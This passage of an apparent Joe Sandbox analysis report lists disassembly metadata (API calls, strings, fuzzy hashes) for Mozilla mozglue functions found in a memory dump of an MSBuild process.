                                                                                                                                                                                                                        • Part of subcall function 6C8C7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8C85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C76A7
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8C85B2
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8A5EDB
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: memset.VCRUNTIME140(6C8E7765,000000E5,55CCCCCC), ref: 6C8A5F27
                                                                                                                                                                                                                        • Part of subcall function 6C8A5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8A5FB2
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2666944752-0
                                                                                                                                                                                                                      • Opcode ID: f2fb0c0cde92b6c89f58a045f66235c3d72162d703b94a27228dde27694ac670
                                                                                                                                                                                                                      • Instruction ID: cb616858952e559079abd3581d62bfd4cee13a08cc6d7e46a1521ac5ce0f0a38
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2fb0c0cde92b6c89f58a045f66235c3d72162d703b94a27228dde27694ac670
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 35217A743006019FDB24DB28C988A6AB7B5AF8430CF24482DE59B83B81DB71F958CB52
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C891699
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916CB
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916D7
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916DE
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916E5
                                                                                                                                                                                                                      • VerSetConditionMask.NTDLL ref: 6C8916EC
                                                                                                                                                                                                                      • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C8916F9
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 375572348-0
                                                                                                                                                                                                                      • Opcode ID: b4131d2526722567d83f53bbf578484642adb1c1f99d26ff7af8578698e1ec8a
                                                                                                                                                                                                                      • Instruction ID: 2b082f84f55bb98f2adde3fa62a9ac96a8aa231c3ecda2b19cad2be235db0c11
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4131d2526722567d83f53bbf578484642adb1c1f99d26ff7af8578698e1ec8a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A221C3B17442086FEB216A688D85FBAB37CDF86704F00492CF6459B580C7749E5486A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD1EC
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD1F5
                                                                                                                                                                                                                        • Part of subcall function 6C8DAD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6C8DAE20
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD211
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DD217
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C8DD226
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8DD279
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8DD2B2
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3049780610-0
                                                                                                                                                                                                                      • Opcode ID: 6fa8b2125fcccfb4cbec6ed19afbb828fe96b9e6e66ec763e7d82104a480b1ea
                                                                                                                                                                                                                      • Instruction ID: 1889868363f2cbcb9472b0c8fccc1ccd00a3913f48045312b1e2e72fbe3c028e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6fa8b2125fcccfb4cbec6ed19afbb828fe96b9e6e66ec763e7d82104a480b1ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17217E71708705DFCB14DF64C488A9EB7B1FF8A324F214A2EE51A87740DB30A809CB96
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF619
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C8CF598), ref: 6C8CF621
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF637
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF645
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF663
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C8CF62A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,6C891C5F), ref: 6C8920AE
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C8920CD
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8920E1
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C892124
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoInitializeSecurity$combase.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8C99C1
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99CE
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8C99F8
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8C9A05
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C9A0D
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: GetCurrentThreadId.KERNEL32 ref: 6C8C9A95
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8C9A9D
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8C9ACC
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8C9BA7
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8C9BB8
                                                                                                                                                                                                                        • Part of subcall function 6C8C9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8C9BC9
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C8C9A15
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C891FDE
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C891FFD
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C892011
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C892059
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoCreateInstance$combase.dll
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C8BD9F0,00000000), ref: 6C890F1D
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C890F3C
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C890F50
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,6C8BD9F0,00000000), ref: 6C890F86
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                                                                                                                                                                      • String ID: CoInitializeEx$combase.dll
                                                                                                                                                                                                                      • API String ID: 4190559335-2063391169
                                                                                                                                                                                                                      • Opcode ID: c08c070f9231ee36fb6a3a3babae1f86959f7e58b894ba151cb37398f25623db
                                                                                                                                                                                                                      • Instruction ID: 0194569d398c0c1eb590a55dd8a4f0d5bb04b38e8ff2fdccfe99dcc220db3423
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c08c070f9231ee36fb6a3a3babae1f86959f7e58b894ba151cb37398f25623db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 281182757092409BDF60CF5CCA08E6A37B5EB8B329F204A2DE90692BC1D730E605CB59
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF559
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF561
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF577
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF585
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CF5A3
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause_sampling, xrefs: 6C8CF3A8
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume_sampling, xrefs: 6C8CF499
                                                                                                                                                                                                                      • [I %d/%d] profiler_resume, xrefs: 6C8CF239
                                                                                                                                                                                                                      • [D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C8CF56A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
                                                                                                                                                                                                                      • API String ID: 2848912005-2840072211
                                                                                                                                                                                                                      • Opcode ID: 8c4f93158b636b75638192ee1e3bd2db6bc1afbaf26269fdb972ff56aaad1330
                                                                                                                                                                                                                      • Instruction ID: 568077fc78ccacfa0cf33b6b7a67438336a63581d412caa3563236eab425b247
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c4f93158b636b75638192ee1e3bd2db6bc1afbaf26269fdb972ff56aaad1330
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDF054767042049FEB106F69D84C95A77BDEB8625DF20046DEF0583701DB75C90587A5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C894A68), ref: 6C8C945E
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8C9470
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8C9482
                                                                                                                                                                                                                        • Part of subcall function 6C8C9420: __Init_thread_footer.LIBCMT ref: 6C8C949F
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF619
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C8CF598), ref: 6C8CF621
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CF637
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF645
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8,?,?,00000000,?,6C8CF598), ref: 6C8CF663
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C8CF62A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                                                                                      • API String ID: 2848912005-753366533
                                                                                                                                                                                                                      • Opcode ID: fe267e4c025543341db681c7eb4f1206f5071da0213a2ca11fb7a60dc6e3d151
                                                                                                                                                                                                                      • Instruction ID: dceb35fddc06644032d9795af420d94745848d99b2e5eab98ea4de0721384ad7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe267e4c025543341db681c7eb4f1206f5071da0213a2ca11fb7a60dc6e3d151
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF05475304204ABEB106B69C84CD5A777DEB8629DF20046DFE0583741CB758D0587A5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(kernel32.dll,6C890DF8), ref: 6C890E82
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C890EA1
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C890EB5
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C890EC5
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeInit_thread_footerLoadProc
                                                                                                                                                                                                                      • String ID: GetProcessMitigationPolicy$kernel32.dll
                                                                                                                                                                                                                      • API String ID: 391052410-1680159014
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C8BCFAE,?,?,?,6C8831A7), ref: 6C8C05FB
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C8BCFAE,?,?,?,6C8831A7), ref: 6C8C0616
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C8831A7), ref: 6C8C061C
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C8831A7), ref: 6C8C0627
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _writestrlen
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C6060: moz_xmalloc.MOZGLUE(00000024,546D5915,00000000,?,00000000,?,?,6C8C5FCB,6C8C79A3), ref: 6C8C6078
                                                                                                                                                                                                                      • free.MOZGLUE(-00000001), ref: 6C8C72F6
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C7311
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                                                                                      • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                                                                                                                                                      • API String ID: 3009372454-760240034
                                                                                                                                                                                                                      APIs
